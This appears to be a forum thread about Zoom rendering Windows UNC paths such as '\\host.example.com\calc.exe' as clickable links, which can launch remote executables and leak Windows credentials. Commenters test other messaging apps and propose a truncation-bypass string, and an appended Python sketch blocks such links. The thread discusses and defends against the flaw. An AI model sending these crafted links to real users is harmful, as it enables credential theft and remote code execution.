
This is linking to a source on Twitter https://twitter.com/hackerfantastic/status/12451333712626196... with a short demo on YouTube https://www.youtube.com/watch?v=Om1w4DVkkEU

From what I can gather, you can send a message in Zoom with a link like "\\host.example.com\calc.exe". Zoom will highlight it as a clickable link.

Assuming you can get the user to click it:

1) It will fetch the remote executable and run.

2) It transparently transmits Windows authentication of the user to the remote server, expecting a network share that may require authentication.




You can also do the exact same thing in any messaging app.


I don't think so. Other messaging apps don't parse strings starting with \\ as links and if they do, they hopefully undo it for the .exe extension.


Have you tried that?

Hangouts: \\servername.tld\share doesn't parse as a UNC, instead becomes clickable and brings up a browser to "servername.tld"

Skype for business: Does exactly what Zoom does, turns the entire thing into a clickable link

MS Teams: Doesn't parse as clickable at all

That's all I have in front of me at the moment...


> Does exactly what Zoom does, turns the entire thing into a clickable link

And runs it when you click on it?


Just went and confirmed, in Skype for Business it does not launch the executable but rather opens explorer to the share and highlights the .EXE. So, anyone operating that share will still be passed your creds, but it doesn't launch the executable.

Testing in Zoom, it launches the OS prompt to confirm .exe launch. Tested in Windows 10.


Could you try Skype with \\servername.tld\path\file.exe\extra.text

There is a good chance it will run file.exe if they cut the end of the string naively. :D


Oh that is an interesting approach...

Skype for business threw an error: "Sorry, we couldn't open the link".


No hyperlink in any reasonably-authored messaging app is both going to download+run an .exe file without confirmation AND send your credentials to the remote server without prompting. It's absurd behavior.
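
Added example, not part of any comment above and not code from Zoom, Skype or any other client: a sketch of the link-classification step a chat client could run before making text clickable, so that the path shapes quoted in this thread stay plain text. The names `ALLOWED_SCHEMES`, `TRIM`, `is_unc_like`, `classify` and `linkify` are hypothetical, and the sample messages are constructed.

```python
ALLOWED_SCHEMES = ("http://", "https://")  # assumption: only web links become clickable
TRIM = "\"'<>()[]{}.,;!?"                  # punctuation that often wraps a pasted path

def is_unc_like(token: str) -> bool:
    """True if Windows could resolve the token as a network (UNC) path."""
    t = token.lower()
    # Win32 path handling treats '/' like '\', so //host/share is UNC as well.
    if t.replace("/", "\\").startswith("\\\\"):
        return True
    # file: URLs can name a remote host; this sketch refuses all of them.
    return t.startswith("file:")

def classify(token: str) -> str:
    """Decide how one whitespace-delimited token should be rendered."""
    core = token.strip(TRIM)
    if is_unc_like(core):
        return "unc-blocked"   # render as inert text, never hand to the shell
    if core.lower().startswith(ALLOWED_SCHEMES):
        return "link"
    return "text"

def linkify(message: str) -> list[tuple[str, str]]:
    """Return (token, decision) pairs for every token in a chat message."""
    return [(tok, classify(tok)) for tok in message.split()]

# Constructed sample messages using the path shapes quoted in the thread.
SAMPLES = [
    r'try "\\host.example.com\calc.exe" please',
    r'\\servername.tld\share',
    r'\\servername.tld\path\file.exe\extra.text',
    r'//servername.tld/share/file.exe',
    r'FILE://servername.tld/share/file.exe',
    r'docs are at https://example.com/a.',
]

if __name__ == "__main__":
    for msg in SAMPLES:
        for tok, decision in linkify(msg):
            if decision != "text":
                print(f"{decision:12} {tok}")
```

Classifying the whole token, rather than trimming path components off the end, means the `file.exe\extra.text` variant is refused as a unit instead of being shortened to something launchable.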



